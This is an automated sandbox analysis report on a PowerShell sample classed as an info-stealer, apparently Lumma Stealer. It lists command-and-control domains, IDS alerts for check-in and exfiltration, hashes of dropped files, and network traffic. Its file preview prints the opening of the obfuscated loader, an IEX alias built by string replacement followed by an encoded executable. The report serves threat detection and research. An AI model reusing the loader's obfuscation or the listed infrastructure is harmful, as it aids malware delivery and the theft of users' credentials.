aleksandr-block.com | 188.114.96.3 | true | true | unknown | |
steamcommunity.com | 104.102.49.254 | true | false | high | |
finickypwk.lat | unknown | unknown | true | unknown | |
washyceehsu.lat | unknown | unknown | true | unknown | |
kickykiduz.lat | unknown | unknown | true | unknown | |
bloodyswif.lat | unknown | unknown | true | unknown | |
shoefeatthe.lat | unknown | unknown | true | unknown | |
savorraiykj.lat | unknown | unknown | true | unknown | |
miniatureyu.lat | unknown | unknown | true | unknown | |
curtainykeo.lat | unknown | unknown | true | unknown | |
leggelatez.lat | unknown | unknown | true | unknown |
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
| false | | high |
| true | | unknown |
| true | | unknown |
| true | | unknown |
| true | | unknown |
| true | | unknown |
| true | | unknown |
| true | | unknown |
| true | | unknown |
| true | | unknown |
| true | | unknown |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
| | false | | high |
| | false | | high |
| | false | | high |
| | false | | high |
| | false | | high |
| | false | | high |
| | false | | high |
| | false | | unknown |
| | false | | high |
| | false | | high |
| | false | | high |
| | false | | unknown |
| | false | | unknown |
| | false | | unknown |
| | false | | unknown |
| | false | | unknown |
| | false | | high |
| | false | | high |
| | false | | unknown |
| | false | | high |
| | false | | unknown |
| | false | | high |
| | false | | high |
| | false | | unknown |
| | false | | high |
| | false | | unknown |
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
188.114.96.3 | aleksandr-block.com | European Union | | 13335 | CLOUDFLARENETUS | true |
104.102.49.254 | steamcommunity.com | United States | | 16625 | AKAMAI-ASUS | false |
Joe Sandbox version: | 42.0.0 Malachite |
Analysis ID: | 1590524 |
Start date and time: | 2025-01-14 08:26:11 +01:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 5m 22s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01 |
Number of analysed new started processes analysed: | 11 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: | |
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Sample name: | 92.255.57_2.112.ps1 |
Detection: | MAL |
Classification: | mal100.troj.spyw.evad.winPS1@10/10@11/2 |
EGA Information: | |
HCA Information: | |
Cookbook Comments: | |
- Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
- Excluded IPs from analysis (whitelisted): 20.42.65.92, 40.126.32.140, 20.109.210.53, 4.175.87.197, 13.107.246.45
- Excluded domains from analysis (whitelisted): onedsblobprdeus17.eastus.cloudapp.azure.com, ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
- Not all processes were analyzed; the report is missing behavior information
- Report size getting too big, too many NtOpenKeyEx calls found.
- Report size getting too big, too many NtQueryValueKey calls found.
- Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description |
---|---|---|
02:27:10 | API Interceptor | |
02:27:11 | API Interceptor | |
02:27:24 | API Interceptor |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
188.114.96.3 | | Get hash | malicious | FormBook | Browse | |
| | Get hash | malicious | FormBook | Browse | |
| | Get hash | malicious | FormBook | Browse | |
| | Get hash | malicious | Unknown | Browse | |
| | Get hash | malicious | FormBook | Browse | |
| | Get hash | malicious | FormBook | Browse | |
| | Get hash | malicious | FormBook | Browse | |
| | Get hash | malicious | FormBook | Browse | |
| | Get hash | malicious | FormBook | Browse | |
| | Get hash | malicious | HTMLPhisher | Browse | |
104.102.49.254 | | Get hash | malicious | Socks5Systemz | Browse | |
| | Get hash | malicious | Unknown | Browse | |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
steamcommunity.com | | Get hash | malicious | LummaC | Browse | |
| | Get hash | malicious | LummaC | Browse | |
| | Get hash | malicious | LummaC | Browse | |
| | Get hash | malicious | LummaC | Browse | |
| | Get hash | malicious | LummaC | Browse | |
| | Get hash | malicious | LummaC | Browse | |
| | Get hash | malicious | LummaC, Amadey, Babadeda, DanaBot, KeyLogger, LummaC Stealer, Poverty Stealer | Browse | |
| | Get hash | malicious | LummaC | Browse | |
| | Get hash | malicious | LummaC | Browse | |
| | Get hash | malicious | LummaC | Browse | |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
CLOUDFLARENETUS | | Get hash | malicious | Phisher | Browse | |
| | Get hash | malicious | DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger | Browse | |
| | Get hash | malicious | Unknown | Browse | |
| | Get hash | malicious | Unknown | Browse | |
| | Get hash | malicious | Unknown | Browse | |
| | Get hash | malicious | EvilProxy, HTMLPhisher | Browse | |
| | Get hash | malicious | HTMLPhisher | Browse | |
| | Get hash | malicious | Unknown | Browse | |
| | Get hash | malicious | Unknown | Browse | |
| | Get hash | malicious | Unknown | Browse | |
AKAMAI-ASUS | | Get hash | malicious | HTMLPhisher | Browse | |
| | Get hash | malicious | Unknown | Browse | |
| | Get hash | malicious | HTMLPhisher | Browse | |
| | Get hash | malicious | LummaC | Browse | |
| | Get hash | malicious | HTMLPhisher | Browse | |
| | Get hash | malicious | DanaBot, Vidar | Browse | |
| | Get hash | malicious | Unknown | Browse | |
| | Get hash | malicious | HTMLPhisher | Browse | |
| | Get hash | malicious | Unknown | Browse | |
| | Get hash | malicious | Mirai, Okiru | Browse | |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
a0e9f5d64349fb13191bc781f81f42e1 | | Get hash | malicious | DBatLoader | Browse | |
| | Get hash | malicious | DBatLoader | Browse | |
| | Get hash | malicious | DBatLoader | Browse | |
| | Get hash | malicious | DBatLoader | Browse | |
| | Get hash | malicious | DBatLoader | Browse | |
| | Get hash | malicious | DBatLoader | Browse | |
| | Get hash | malicious | DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger | Browse | |
| | Get hash | malicious | Unknown | Browse | |
| | Get hash | malicious | LummaC | Browse | |
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\Critical_powershell.exe_a2abdbfe428d67222a333c07b1678b548034_00000000_5eafda4c-73f2-47a9-8cd5-03beb515af73\Report.wer
Process: | C:\Windows\System32\wermgr.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 65536 |
Entropy (8bit): | 0.5322122137743448 |
Encrypted: | false |
SSDEEP: | 96:FmhFr3FwjfrxYid6zRH3Uje0e35/3oo16l51QXIGZAX/d5FMT2SlPkpXmTA/f/V3:Ax3EfmG6zR30md8cAzuiF3Z24lO8 |
MD5: | 32991AA0DA6D45CD9754C7F8D70F683A |
SHA1: | CCA785411DB556A2CB72A443D8A529465CE4653B |
SHA-256: | B177EF80A3569CA4B52DDAD88A57785F280937FECB2C79D589F7121CDFAC81F5 |
SHA-512: | 6408477C72EEAD87AABA16CB9E7A46459BBF47BEE055A2F36896BB1275EDC9108F145D1F7879C6D485611156BBD372C08C5930D8B93199CABDF3AEA6F049F943 |
Malicious: | false |
Reputation: | low |
Preview: |
Process: | C:\Windows\System32\wermgr.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 7288 |
Entropy (8bit): | 3.7391905680956112 |
Encrypted: | false |
SSDEEP: | 192:R6l7wVeJr3x6Y9LxHbgmft887cpV3aX7m:R6lXJrx6YBxHbgmftZoCy |
MD5: | 69D682DB088C2719B46A65B43E427F54 |
SHA1: | A8AACD59B448FBA7E3BDF9DFAC16B9E430498CB9 |
SHA-256: | E879F748EF2C3004A3CAD6FC479BD117FA4581993D885CC0285A6E4857227FE2 |
SHA-512: | D1B57D5D6CD5F6ED22968485FC7892D3497AF023462CADBD512DCBE7CE01F8282B1C66A1324947312EB0C518F9F24C350A68584634BAB43D24EBEBCAB0434915 |
Malicious: | false |
Reputation: | low |
Preview: |
Process: | C:\Windows\System32\wermgr.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 4905 |
Entropy (8bit): | 4.688993761991504 |
Encrypted: | false |
SSDEEP: | 96:uIjfBI7MwW7VmJFKloF1cmFzcWTzF1cmF2ufnd:uIlYMwW7A4Jq7UNufd |
MD5: | 43E5AD6642DD1F73286C4AE7DBA9DDDF |
SHA1: | 46AE11BE1634A27AB020115052AA9C18A4ED998A |
SHA-256: | CAFFD14C85E3869080F87F36620803D3B3DBD26926576AB84EBE5B3C17FDD401 |
SHA-512: | 0D9BFCC14F5379245FE753F272AE87ACB6D0C4E485CAB1B816B190AE799B169167B1E885422D446797CCBC018D642FA95355F28213B7B1D1A2599E3B25253DC8 |
Malicious: | false |
Reputation: | low |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 11608 |
Entropy (8bit): | 4.890472898059848 |
Encrypted: | false |
SSDEEP: | 192:6xoe5qpOZxoe54ib4ZVsm5emdqVFn3eGOVpN6K3bkkjo5OgkjDt4iWN3yBGHVQ9R:9rib4ZmVoGIpN6KQkj2Fkjh4iUxsT6YP |
MD5: | 8A4B02D8A977CB929C05D4BC2942C5A9 |
SHA1: | F9A6426CAF2E8C64202E86B07F1A461056626BEA |
SHA-256: | 624047EB773F90D76C34B708F48EA8F82CB0EC0FCF493CA2FA704FCDA7C4B715 |
SHA-512: | 38697525814CDED7B27D43A7B37198518E295F992ECB255394364EC02706443FB3298CBBAA57629CCF8DDBD26FD7CAAC44524C4411829147C339DD3901281AC2 |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 64 |
Entropy (8bit): | 1.1628158735648508 |
Encrypted: | false |
SSDEEP: | 3:NlllulLhwlz:NllUO |
MD5: | F442CD24937ABD508058EA44FD91378E |
SHA1: | FDE63CECA441AA1C5C9C401498F9032A23B38085 |
SHA-256: | E2960AF08E2EE7C9C72EEA31DBBFE1B55B9BF84DE2DD7BB7204487E6AF37B8F6 |
SHA-512: | 927E2EEA0BB3FC3D3A0DA7F45644F594CE29F11D90A84B005D723500258DE9E8B3780EB87242F4C62B64B9FEEA1869FC16076FA3AC89EC34E0546CDE1BEF7631 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 6221 |
Entropy (8bit): | 3.7221094830592123 |
Encrypted: | false |
SSDEEP: | 96:+nlQf33CxH5CkvhkvCCtClLv0IjHvlLv0IKHv:+lQfyZeqTLTW |
MD5: | 4944A55015B1938A53F5C0B46FCCC212 |
SHA1: | 525584A334359891021CBCF2EFBD9DBACC3F2A4C |
SHA-256: | EC6F30A0A1FD6B391B1EA4291D536D157F542D655ECBE46DDEEF4ED386DFB708 |
SHA-512: | 70A1FF38D9B4CAAA90F1712596FF1293FD87686414B3414FFE25083B8BBC6300F9D26416B2B5E70BEBC28B02169A6E85FD5AC5980D55D8CD7FF023BA785CD356 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\X6MBSE624Q4SSGMC0VO5.temp
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 6221 |
Entropy (8bit): | 3.7221094830592123 |
Encrypted: | false |
SSDEEP: | 96:+nlQf33CxH5CkvhkvCCtClLv0IjHvlLv0IKHv:+lQfyZeqTLTW |
MD5: | 4944A55015B1938A53F5C0B46FCCC212 |
SHA1: | 525584A334359891021CBCF2EFBD9DBACC3F2A4C |
SHA-256: | EC6F30A0A1FD6B391B1EA4291D536D157F542D655ECBE46DDEEF4ED386DFB708 |
SHA-512: | 70A1FF38D9B4CAAA90F1712596FF1293FD87686414B3414FFE25083B8BBC6300F9D26416B2B5E70BEBC28B02169A6E85FD5AC5980D55D8CD7FF023BA785CD356 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1835008 |
Entropy (8bit): | 4.466284072855703 |
Encrypted: | false |
SSDEEP: | 6144:dIXfpi67eLPU9skLmb0b4zWSPKaJG8nAgejZMMhA2gX4WABl0uNCdwBCswSb+:OXD94zWlLZMM6YFHc++ |
MD5: | B70688E6E3A66AA5D92F25B014454752 |
SHA1: | 7ACE154329D77ED08FFC44CA8991EBC2E2B3F4AC |
SHA-256: | AA02BFD6C47709F9FA04B627B0076FD37232F0D85E60294A853FE3F6A3A48AF8 |
SHA-512: | DB367B102CC19ED7E56420B0FDBCFA0F946BF92ABCB79381B860E8D82D1268442C4D57CE1C3F5161FF5DACEFBF87B93C4FC2AB0299DE85CA0C5E2FF28A60EDDB |
Malicious: | false |
Preview: |
File type: | |
Entropy (8bit): | 5.485201881959517 |
TrID: | |
File name: | 92.255.57_2.112.ps1 |
File size: | 539'177 bytes |
MD5: | be4f493e0b615fa9df3216132c14f763 |
SHA1: | dfda3628a9b8971a043fafab4c6ee95c8b4cd5cc |
SHA256: | 229385fbe03dd8ab9489ee1f0f4a5916b89be800aa27b7d563b63080211235a9 |
SHA512: | 4f69d6de21d1de46778437be2f42bbea0a92ce889091b99eb37be280dae80d410f3d69c4018dccf3398b90dd50809b4aa92767e173f0e7aace13531feceac9ac |
SSDEEP: | 12288:cG34WzRsAX2h7dVI42CoeUJ2z6m20sFqwg2:cGdyZPIvLJ2z20sFFg2 |
TLSH: | B4B47D3140533C5E3F6E2ECAA4006DC00C9D39A7BA14D154AEC992B6B2BD53B5E6D9FC |
File Content Preview: | .. $t0='IQIQQIIQIQQEX'.replace('IQIQQ','');sal GG $t0;....$OE="qQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAIp2gmcAAAAAAA |
Icon Hash: | 3270d6baae77db44 |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-01-14T08:27:11.805855+0100 | 2059189 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bloodyswif .lat) | 1 | 192.168.2.4 | 58984 | 1.1.1.1 | 53 | UDP |
2025-01-14T08:27:11.817677+0100 | 2059211 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (washyceehsu .lat) | 1 | 192.168.2.4 | 60549 | 1.1.1.1 | 53 | UDP |
2025-01-14T08:27:11.830325+0100 | 2059201 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (leggelatez .lat) | 1 | 192.168.2.4 | 56901 | 1.1.1.1 | 53 | UDP |
2025-01-14T08:27:11.848565+0100 | 2059203 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (miniatureyu .lat) | 1 | 192.168.2.4 | 60048 | 1.1.1.1 | 53 | UDP |
2025-01-14T08:27:11.877255+0100 | 2059199 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (kickykiduz .lat) | 1 | 192.168.2.4 | 64720 | 1.1.1.1 | 53 | UDP |
2025-01-14T08:27:11.893391+0100 | 2059207 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (savorraiykj .lat) | 1 | 192.168.2.4 | 60715 | 1.1.1.1 | 53 | UDP |
2025-01-14T08:27:11.905812+0100 | 2059209 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (shoefeatthe .lat) | 1 | 192.168.2.4 | 54093 | 1.1.1.1 | 53 | UDP |
2025-01-14T08:27:11.927906+0100 | 2059191 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (finickypwk .lat) | 1 | 192.168.2.4 | 53855 | 1.1.1.1 | 53 | UDP |
2025-01-14T08:27:12.602411+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49730 | 104.102.49.254 | 443 | TCP |
2025-01-14T08:27:13.109424+0100 | 2858666 | ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup | 1 | 192.168.2.4 | 49730 | 104.102.49.254 | 443 | TCP |
2025-01-14T08:27:13.819855+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49732 | 188.114.96.3 | 443 | TCP |
2025-01-14T08:27:14.261530+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.4 | 49732 | 188.114.96.3 | 443 | TCP |
2025-01-14T08:27:14.261530+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49732 | 188.114.96.3 | 443 | TCP |
2025-01-14T08:27:14.743708+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49736 | 188.114.96.3 | 443 | TCP |
2025-01-14T08:27:15.093246+0100 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.4 | 49736 | 188.114.96.3 | 443 | TCP |
2025-01-14T08:27:15.093246+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49736 | 188.114.96.3 | 443 | TCP |
2025-01-14T08:27:15.727636+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49738 | 188.114.96.3 | 443 | TCP |
2025-01-14T08:27:17.659036+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49740 | 188.114.96.3 | 443 | TCP |
2025-01-14T08:27:18.480783+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.4 | 49740 | 188.114.96.3 | 443 | TCP |
2025-01-14T08:27:19.021812+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49741 | 188.114.96.3 | 443 | TCP |
2025-01-14T08:27:20.289084+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49743 | 188.114.96.3 | 443 | TCP |
2025-01-14T08:27:22.160237+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49745 | 188.114.96.3 | 443 | TCP |
2025-01-14T08:27:24.845892+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49748 | 188.114.96.3 | 443 | TCP |
2025-01-14T08:27:25.345878+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49748 | 188.114.96.3 | 443 | TCP |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Jan 14, 2025 08:27:11.957742929 CET | 49730 | 443 | 192.168.2.4 | 104.102.49.254 |
Jan 14, 2025 08:27:11.957803965 CET | 443 | 49730 | 104.102.49.254 | 192.168.2.4 |
Jan 14, 2025 08:27:11.957885981 CET | 49730 | 443 | 192.168.2.4 | 104.102.49.254 |
Jan 14, 2025 08:27:11.962060928 CET | 49730 | 443 | 192.168.2.4 | 104.102.49.254 |
Jan 14, 2025 08:27:11.962097883 CET | 443 | 49730 | 104.102.49.254 | 192.168.2.4 |
Jan 14, 2025 08:27:12.602304935 CET | 443 | 49730 | 104.102.49.254 | 192.168.2.4 |
Jan 14, 2025 08:27:12.602411032 CET | 49730 | 443 | 192.168.2.4 | 104.102.49.254 |
Jan 14, 2025 08:27:12.606659889 CET | 49730 | 443 | 192.168.2.4 | 104.102.49.254 |
Jan 14, 2025 08:27:12.606687069 CET | 443 | 49730 | 104.102.49.254 | 192.168.2.4 |
Jan 14, 2025 08:27:12.607043028 CET | 443 | 49730 | 104.102.49.254 | 192.168.2.4 |
Jan 14, 2025 08:27:12.654783964 CET | 49730 | 443 | 192.168.2.4 | 104.102.49.254 |
Jan 14, 2025 08:27:12.656572104 CET | 49730 | 443 | 192.168.2.4 | 104.102.49.254 |
Jan 14, 2025 08:27:12.699340105 CET | 443 | 49730 | 104.102.49.254 | 192.168.2.4 |
Jan 14, 2025 08:27:13.109472036 CET | 443 | 49730 | 104.102.49.254 | 192.168.2.4 |
Jan 14, 2025 08:27:13.109503984 CET | 443 | 49730 | 104.102.49.254 | 192.168.2.4 |
Jan 14, 2025 08:27:13.109544992 CET | 443 | 49730 | 104.102.49.254 | 192.168.2.4 |
Jan 14, 2025 08:27:13.109569073 CET | 443 | 49730 | 104.102.49.254 | 192.168.2.4 |
Jan 14, 2025 08:27:13.109574080 CET | 49730 | 443 | 192.168.2.4 | 104.102.49.254 |
Jan 14, 2025 08:27:13.109597921 CET | 443 | 49730 | 104.102.49.254 | 192.168.2.4 |
Jan 14, 2025 08:27:13.109611034 CET | 443 | 49730 | 104.102.49.254 | 192.168.2.4 |
Jan 14, 2025 08:27:13.109620094 CET | 49730 | 443 | 192.168.2.4 | 104.102.49.254 |
Jan 14, 2025 08:27:13.109627008 CET | 49730 | 443 | 192.168.2.4 | 104.102.49.254 |
Jan 14, 2025 08:27:13.109668016 CET | 49730 | 443 | 192.168.2.4 | 104.102.49.254 |
Jan 14, 2025 08:27:13.199007034 CET | 443 | 49730 | 104.102.49.254 | 192.168.2.4 |
Jan 14, 2025 08:27:13.199038029 CET | 443 | 49730 | 104.102.49.254 | 192.168.2.4 |
Jan 14, 2025 08:27:13.199237108 CET | 49730 | 443 | 192.168.2.4 | 104.102.49.254 |
Jan 14, 2025 08:27:13.199273109 CET | 443 | 49730 | 104.102.49.254 | 192.168.2.4 |
Jan 14, 2025 08:27:13.203835964 CET | 443 | 49730 | 104.102.49.254 | 192.168.2.4 |
Jan 14, 2025 08:27:13.203943014 CET | 443 | 49730 | 104.102.49.254 | 192.168.2.4 |
Jan 14, 2025 08:27:13.203947067 CET | 49730 | 443 | 192.168.2.4 | 104.102.49.254 |
Jan 14, 2025 08:27:13.206785917 CET | 49730 | 443 | 192.168.2.4 | 104.102.49.254 |
Jan 14, 2025 08:27:13.316840887 CET | 49730 | 443 | 192.168.2.4 | 104.102.49.254 |
Jan 14, 2025 08:27:13.316906929 CET | 443 | 49730 | 104.102.49.254 | 192.168.2.4 |
Jan 14, 2025 08:27:13.316922903 CET | 49730 | 443 | 192.168.2.4 | 104.102.49.254 |
Jan 14, 2025 08:27:13.316930056 CET | 443 | 49730 | 104.102.49.254 | 192.168.2.4 |
Jan 14, 2025 08:27:13.336785078 CET | 49732 | 443 | 192.168.2.4 | 188.114.96.3 |
Jan 14, 2025 08:27:13.336812973 CET | 443 | 49732 | 188.114.96.3 | 192.168.2.4 |
Jan 14, 2025 08:27:13.336908102 CET | 49732 | 443 | 192.168.2.4 | 188.114.96.3 |
Jan 14, 2025 08:27:13.337241888 CET | 49732 | 443 | 192.168.2.4 | 188.114.96.3 |
Jan 14, 2025 08:27:13.337256908 CET | 443 | 49732 | 188.114.96.3 | 192.168.2.4 |
Jan 14, 2025 08:27:13.819782019 CET | 443 | 49732 | 188.114.96.3 | 192.168.2.4 |
Jan 14, 2025 08:27:13.819854975 CET | 49732 | 443 | 192.168.2.4 | 188.114.96.3 |
Jan 14, 2025 08:27:13.821949005 CET | 49732 | 443 | 192.168.2.4 | 188.114.96.3 |
Jan 14, 2025 08:27:13.821974993 CET | 443 | 49732 | 188.114.96.3 | 192.168.2.4 |
Jan 14, 2025 08:27:13.822283983 CET | 443 | 49732 | 188.114.96.3 | 192.168.2.4 |
Jan 14, 2025 08:27:13.823714018 CET | 49732 | 443 | 192.168.2.4 | 188.114.96.3 |
Jan 14, 2025 08:27:13.823714018 CET | 49732 | 443 | 192.168.2.4 | 188.114.96.3 |
Jan 14, 2025 08:27:13.823822975 CET | 443 | 49732 | 188.114.96.3 | 192.168.2.4 |
Jan 14, 2025 08:27:14.261548996 CET | 443 | 49732 | 188.114.96.3 | 192.168.2.4 |
Jan 14, 2025 08:27:14.261674881 CET | 443 | 49732 | 188.114.96.3 | 192.168.2.4 |
Jan 14, 2025 08:27:14.261725903 CET | 49732 | 443 | 192.168.2.4 | 188.114.96.3 |
Jan 14, 2025 08:27:14.262547970 CET | 49732 | 443 | 192.168.2.4 | 188.114.96.3 |
Jan 14, 2025 08:27:14.262569904 CET | 443 | 49732 | 188.114.96.3 | 192.168.2.4 |
Jan 14, 2025 08:27:14.262583971 CET | 49732 | 443 | 192.168.2.4 | 188.114.96.3 |
Jan 14, 2025 08:27:14.262588978 CET | 443 | 49732 | 188.114.96.3 | 192.168.2.4 |
Jan 14, 2025 08:27:14.271222115 CET | 49736 | 443 | 192.168.2.4 | 188.114.96.3 |
Jan 14, 2025 08:27:14.271271944 CET | 443 | 49736 | 188.114.96.3 | 192.168.2.4 |
Jan 14, 2025 08:27:14.271351099 CET | 49736 | 443 | 192.168.2.4 | 188.114.96.3 |
Jan 14, 2025 08:27:14.271692991 CET | 49736 | 443 | 192.168.2.4 | 188.114.96.3 |
Jan 14, 2025 08:27:14.271706104 CET | 443 | 49736 | 188.114.96.3 | 192.168.2.4 |
Jan 14, 2025 08:27:14.743582010 CET | 443 | 49736 | 188.114.96.3 | 192.168.2.4 |
Jan 14, 2025 08:27:14.743707895 CET | 49736 | 443 | 192.168.2.4 | 188.114.96.3 |
Jan 14, 2025 08:27:14.745166063 CET | 49736 | 443 | 192.168.2.4 | 188.114.96.3 |
Jan 14, 2025 08:27:14.745176077 CET | 443 | 49736 | 188.114.96.3 | 192.168.2.4 |
Jan 14, 2025 08:27:14.745490074 CET | 443 | 49736 | 188.114.96.3 | 192.168.2.4 |
Jan 14, 2025 08:27:14.758286953 CET | 49736 | 443 | 192.168.2.4 | 188.114.96.3 |
Jan 14, 2025 08:27:14.758315086 CET | 49736 | 443 | 192.168.2.4 | 188.114.96.3 |
Jan 14, 2025 08:27:14.758388996 CET | 443 | 49736 | 188.114.96.3 | 192.168.2.4 |
Jan 14, 2025 08:27:15.093241930 CET | 443 | 49736 | 188.114.96.3 | 192.168.2.4 |
Jan 14, 2025 08:27:15.093332052 CET | 443 | 49736 | 188.114.96.3 | 192.168.2.4 |
Jan 14, 2025 08:27:15.093385935 CET | 49736 | 443 | 192.168.2.4 | 188.114.96.3 |
Jan 14, 2025 08:27:15.093405008 CET | 443 | 49736 | 188.114.96.3 | 192.168.2.4 |
Jan 14, 2025 08:27:15.093419075 CET | 443 | 49736 | 188.114.96.3 | 192.168.2.4 |
Jan 14, 2025 08:27:15.093460083 CET | 49736 | 443 | 192.168.2.4 | 188.114.96.3 |
Jan 14, 2025 08:27:15.093508005 CET | 443 | 49736 | 188.114.96.3 | 192.168.2.4 |
Jan 14, 2025 08:27:15.093589067 CET | 443 | 49736 | 188.114.96.3 | 192.168.2.4 |
Jan 14, 2025 08:27:15.093626976 CET | 49736 | 443 | 192.168.2.4 | 188.114.96.3 |
Jan 14, 2025 08:27:15.093633890 CET | 443 | 49736 | 188.114.96.3 | 192.168.2.4 |
Jan 14, 2025 08:27:15.093688965 CET | 443 | 49736 | 188.114.96.3 | 192.168.2.4 |
Jan 14, 2025 08:27:15.093725920 CET | 49736 | 443 | 192.168.2.4 | 188.114.96.3 |
Jan 14, 2025 08:27:15.093730927 CET | 443 | 49736 | 188.114.96.3 | 192.168.2.4 |
